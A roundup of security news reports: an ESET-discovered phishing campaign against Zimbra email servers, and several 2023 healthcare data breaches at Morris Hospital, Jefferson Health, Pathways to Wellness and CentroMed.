Massive Phishing Campaign Targets Zimbra Collaboration Email Servers
ESET researchers have discovered a massive and continuing phishing campaign targeting Zimbra Collaboration email servers of SME enterprises and government organizations. The campaign is active as of April and is being carried out worldwide, with Ecuador, Italy, and Poland as the most attacked nations. The campaign doesn’t seem to be targeted at any particular vertical.
The attacker sent an email message including an HTML attachment to the targets. The email tells the user that the email server is having an update or Zimbra is having an issue like a security update. The From field shows that an email server admin sent the email. The user is instructed to download the HTML file, which has a URL going to a local file patch. The HTML attachment consists of the targeted company’s logo, the company’s name, and a bogus sign-in page, with the prefilled username. The user is just expected to type in their password. When the password is inputted, the credentials are sent by HTTPS POST request to a server controlled by the attacker.
The ESET researchers noticed lots of phishing emails being sent from a few of the companies chosen for the phishing campaign which indicates the attacker acquired admin credentials and could create other mailboxes on the server. The researchers state that in these instances, a similar password could have been utilized for email and admin. Although this email campaign isn’t specifically advanced, it has shown to be successful. Considering that the HTML attachments include legit code and just one URL directed to a malicious host, that is included in the HTML instead of the body of the message, the emails could not be noticed as malicious and are probable to get around antispam guidelines, particularly since the attacked companies are generally small-to-medium-sized enterprises that are not likely to have sophisticated email security protection. ESET could not find out which attacker was responsible for the campaign.
Morris Hospital & Healthcare Centers Informs 249,000 Individuals Concerning a Cyberattack in April
Morris Hospital & Healthcare Centers located in Illinois has begun informing 248,943 people concerning a cyberattack that was discovered on April 4, 2023. Upon discovery of the breach, third-party cybersecurity specialists were involved to check into the incident and find out its nature and extent. It was confirmed that unauthorized individuals exfiltrated files that contained protected health information (PHI) from its systems.
The stolen files contained the PHI of present and past patients, workers, and their beneficiaries or dependents. The PHI included names, addresses, birth dates, account numbers, medical record numbers, diagnostic/treatment codes, and Social Security numbers. Although there was no misuse of the stolen information reported, impacted persons were instructed to be careful and use the free identity theft resolution services that were provided.
The breach notification letters issued by Morris Hospital & Healthcare Centers didn’t mention who the attackers were nor the nature of the cyber attack. Nevertheless, the Royal Ransomware group has professed to be responsible for the cyber attack and included Morris Hospital on its dark web data leak website on May 22, 2023, together with a few of the data that was stolen during the attack.
Lost or Stolen DEXA Scan Backup Drive of Jefferson Health
Jefferson Health has lately begun informing its New Jersey Cherry Hill Hospital patients about the compromise of some of their PHI. A backup drive containing the data was hooked up to its DEXA scan device. While doing routine maintenance, its vendor did not find the backup drive. An investigation of the incident failed to trace the location of the drive and presumed that it was missing or stolen.
The backup drive included names, birth dates, study dates, medical record numbers, and, mailing addresses for some persons. The device additionally contained other data, yet it cannot be viewed without the right credentials and the proper software program and technology. That data contained diagnoses, telephone numbers, insurance data, Social Security numbers, driver’s license numbers, and scans. Jefferson Health is examining and improving its security practices to avoid the same occurrences later on.
The incident is still not published on the breach portal of the HHS’ Office for Civil Rights, hence the number of affected persons is presently uncertain.
Ransomware Attack on Pathways to Wellness Medication Clinics
Patients of Pathways to Wellness Medication Clinics located in Oakland, Union City, as well as Pleasanton in California, were informed about the exposure of some of their PHI in a cyberattack that was discovered on March 28, 2023. An unauthorized person acquired access to and damaged its system. Independent cybersecurity specialists investigated the breach and made its systems secure. Technical safeguards were evaluated and are being upgraded to better safeguard patient information.
Although no report of patient data misuse was received until July 5, 2023, the occurrence of data theft is likely. The compromised data included: first and last name, address, medical insurance data, provider name, birth date, gender, and Social Security number. Impacted persons were provided free single-bureau credit monitoring services. The Office for Civil Rights breach portal has no update about the incident yet, so the number of persons affected is still unclear.
CentroMed Informs 350,000 People About PHI Compromise
El Centro Del Barrio, dba CentroMed based in San Antonio, TX, has notified 350,000 individuals about the potential compromise of some of their PHI during a hacking incident that was discovered on June 12, 2023. It was confirmed by the forensic investigation that unauthorized individuals accessed some of its IT systems on June 9, 2023. The hackers also accessed files that contain PHI and data theft cannot be excluded. The impacted files included the data of present and past patients, workers, employee and provider partners, spouses, and dependents.
The impacted patient information contained names, addresses, birth dates, financial account details, medical records numbers, medical insurance plan member IDs, claims information (such as any diagnoses detailed on claims), and Social Security numbers. Worker and spouse/partner/dependent details consist of names, financial account data, medical insurance plan member IDs, claims information, and Social Security numbers. The impacted persons were sent notification by mail starting on August 11, 2023. CentroMed stated extra safety measures and technical security measures were carried out to avoid the same breaches later on.